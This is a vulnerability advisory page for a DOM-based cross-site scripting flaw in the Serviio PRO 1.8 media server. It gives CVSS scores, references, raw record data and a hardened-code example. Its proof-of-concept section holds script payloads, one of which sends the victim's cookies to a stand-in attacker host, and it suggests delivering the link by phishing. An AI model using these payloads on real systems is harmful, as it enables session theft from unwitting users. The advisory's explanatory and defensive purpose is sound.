Security Vulnerability Report
CVE-2017-20219 CVSS 6.1 MEDIUM

CVE-2017-20219

Published: 2026-03-16 14:17:52
Last Modified: 2026-04-15 14:56:46

Description

Serviio PRO 1.8 DLNA Media Streaming Server contains a DOM-based cross-site scripting vulnerability that allows attackers to execute arbitrary HTML and script code by injecting malicious payloads. Attackers can craft URLs with malicious input that is read from document.location and passed to document.write() in the mediabrowser component to execute code in a user's browser context.
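The source-to-sink pattern described above, modelled as an added example (not Serviio's code) beside a hardened form. The DOM is stubbed: document.location is a plain string argument and document.write() is modelled as the markup the function returns; the `path` query parameter and its allowlist are assumptions made for the example.

```javascript
// Added example: models the document.location -> document.write() flow the
// advisory describes, and a hardened replacement. Runs under Node with no DOM.

// Vulnerable pattern: the raw query string from document.location is
// concatenated straight into markup and handed to the document.write() sink.
function renderVulnerable(locationHref) {
  const query = locationHref.split('?')[1] || '';          // source: document.location
  return '<div id="path">' + query + '</div>';              // sink: document.write(...)
}

// Hardened pattern: parse the query with URLSearchParams, accept only the
// expected parameter, validate it against an allowlist, and HTML-encode it
// before it reaches any markup sink (defence in depth).
const ENTITY = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ENTITY[c]);
}

function renderHardened(locationHref) {
  const query = locationHref.split('?')[1] || '';
  const params = new URLSearchParams(query);               // decodes %xx escapes too
  const path = params.get('path') || '';                   // hypothetical parameter
  // Only a plain folder path is acceptable; anything else falls back to root.
  const safePath = /^[A-Za-z0-9_\/\.\- ]*$/.test(path) ? path : '';
  return '<div id="path">' + escapeHtml(safePath) + '</div>';
}

// Constructed sample inputs, as a reader would try them.
const BENIGN = 'http://host:23424/mediabrowser?path=Music/2017';
const TAINTED = 'http://host:23424/mediabrowser?<img src=x onerror=alert(1)>';
const ENCODED = 'http://host:23424/mediabrowser?path=%3Cscript%3E';
```

The vulnerable renderer reflects the tainted query verbatim, while the hardened one yields an empty path for both the raw and the percent-encoded payloads and passes the benign path through unchanged.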

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available for this record. The affected product named in the description is:

Serviio PRO 1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2017-20219 PoC - DOM-based XSS in Serviio PRO 1.8 mediabrowser
// Target: Serviio PRO 1.8 DLNA Media Streaming Server
// Attack Vector: Inject malicious script via URL parameter to document.write()
// PoC URL (encode special characters if needed):
// http://target:23424/mediabrowser?<script>alert(document.cookie)</script>
// Alternative PoC using event handler:
// http://target:23424/mediabrowser?<img src=x onerror=alert(document.domain)>
// Example attack scenario:
const targetUrl = 'http://target:23424/mediabrowser';
const maliciousPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';
const exploitUrl = `${targetUrl}?${maliciousPayload}`;
console.log('Exploit URL:', exploitUrl);
console.log('Send this URL to victim via phishing email or social engineering');
// When victim visits the URL:
// 1. Browser sends request to Serviio server
// 2. Server returns page with mediabrowser component
// 3. JavaScript reads URL from document.location
// 4. Malicious payload is passed to document.write()
// 5. Script executes in victim's browser context

References

https://blogs.securiteam.com/index.php/archives/3094
https://cxsecurity.com/issue/WLB-2017050020
https://exchange.xforce.ibmcloud.com/vulnerabilities/125647
https://packetstormsecurity.com/files/142385
https://www.vulncheck.com/advisories/serviio-pro-dom-based-cross-site-scripting-via-mediabrowser
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5406.php

Raw JSON Data

JSON
{"cve": {"id": "CVE-2017-20219", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:51.527", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Serviio PRO 1.8 DLNA Media Streaming Server contains a DOM-based cross-site scripting vulnerability that allows attackers to execute arbitrary HTML and script code by injecting malicious payloads. Attackers can craft URLs with malicious input that is read from document.location and passed to document.write() in the mediabrowser component to execute code in a user's browser context."}, {"lang": "es", "value": "Servidor de streaming de medios DLNA Serviio PRO 1.8 contiene una vulnerabilidad de cross-site scripting basada en DOM que permite a los atacantes ejecutar código HTML y de script arbitrario inyectando cargas útiles maliciosas. Los atacantes pueden crear URLs con entrada maliciosa que se lee de document.location y se pasa a document.write() en el componente mediabrowser para ejecutar código en el contexto del navegador de un usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://blogs.securiteam.com/index.php/archives/3094", "source": "[email protected]"}, {"url": "https://cxsecurity.com/issue/WLB-2017050020", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/125647", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/142385", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/serviio-pro-dom-based-cross-site-scripting-via-mediabrowser", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5406.php", "source": "[email protected]"}]}}